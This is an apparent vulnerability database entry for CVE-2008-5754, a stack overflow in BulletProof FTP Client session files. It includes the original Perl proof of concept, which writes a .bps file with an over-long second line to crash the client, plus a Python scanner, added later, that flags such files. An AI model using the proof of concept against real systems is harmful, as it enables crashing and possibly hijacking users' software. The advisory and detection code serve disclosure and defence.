BulletProof FTP Client '.bps' File Stack Buffer Overflow Vulnerability

Vulnerability ID: 1117146
Vulnerability type: Buffer overflow
Published: 2008-12-28
Updated: 2009-06-08
CVE ID: CVE-2008-5754
CNNVD-ID: CNNVD-200812-477
Platform: Windows
CVSS score: 9.3
|Vulnerability source
https://www.exploit-db.com/exploits/7589
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-477
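|Vulnerability details
BulletProof FTP is a new-generation FTP client. The BulletProof FTP client contains a stack-based buffer overflow. A user-assisted attacker can execute arbitrary code via a .bps file (also known as a Session-File) with a long second line. This vulnerability may be related to CVE-2008-5753.
|Exploit (EXP)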
#!/usr/bin/perl
########################################
#[*] Bug : BulletProof FTP Client .bps Local Stack Overflow (PoC)
#[*] Founded by : Mountassif Moad
#[*] Greetz : All Freind Str0ke
#[*] HOw to use => go to file after Load BP session & Enter and boom :d overflowing :d
########################################
use warnings;
use strict;
my $chars   = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n" .
                        "\x41" x 100 .
      "\n21\n".
      "Stack\n".
      "bpfhljamedaldlffpojmqhpo\n".
                        "c:\/\n" .
                        "/\n";
my $file="Stack.bps";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Credits:Stack";

# milw0rm.com [2008-12-28]
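
A defensive triage check for the condition described above (an over-long second line in a .bps Session-File), added here as an example; it is not part of the original advisory or PoC. The 64-byte limit, the function names and the sample files are assumptions, since the page does not state the size of the overflowed buffer.

```python
# Added example: triage check for BulletProof FTP .bps session files.
from pathlib import Path

# First line of a session file, as written by the PoC on this page.
BANNER = b"This is a BulletProof FTP Client Session-File and should not be modified directly."
# ASSUMPTION: the page does not give the size of the overflowed buffer;
# 64 bytes is a placeholder limit to tune for your environment.
MAX_LINE2_LEN = 64


def inspect_bps(data: bytes, max_len: int = MAX_LINE2_LEN) -> dict:
    """Return findings for one session file's raw bytes."""
    lines = data.replace(b"\r\n", b"\n").split(b"\n")
    result = {"is_session_file": False, "line2_len": None, "findings": []}
    if lines[0].strip() != BANNER:
        result["findings"].append("missing-banner")
        return result
    result["is_session_file"] = True
    if len(lines) < 2:
        result["findings"].append("truncated")
        return result
    line2 = lines[1]
    result["line2_len"] = len(line2)
    if len(line2) > max_len:
        result["findings"].append("line2-too-long")
    if any(b < 0x20 or b > 0x7E for b in line2):
        result["findings"].append("line2-non-printable")
    if len(line2) >= 16 and len(set(line2)) == 1:
        result["findings"].append("line2-filler")
    return result


def scan_tree(root: str) -> dict:
    """Inspect every *.bps file under root; return only files with findings."""
    report = {}
    for path in Path(root).rglob("*.bps"):
        res = inspect_bps(path.read_bytes())
        if res["is_session_file"] and res["findings"]:
            report[str(path)] = res
    return report


# Constructed samples: same seven-line layout as the PoC's output.
BENIGN = BANNER + b"\nftp.example.com\n21\nuser\nxxxx\nc:/\n/\n"
OVERLONG = BANNER + b"\n" + b"A" * 100 + b"\n21\nStack\nxxxx\nc:/\n/\n"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("overlong", OVERLONG)):
        print(name, inspect_bps(blob))
```

Run scan_tree() over download folders or mail attachment stores to list session files worth a closer look before anyone opens them in the client.
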
|References

Source: BID
Name: 33024
Link: http://www.securityfocus.com/bid/33024
Source: MILW0RM
Name: 8420
Link: http://www.milw0rm.com/exploits/8420
Source: MILW0RM
Name: 7589
Link: http://www.milw0rm.com/exploits/7589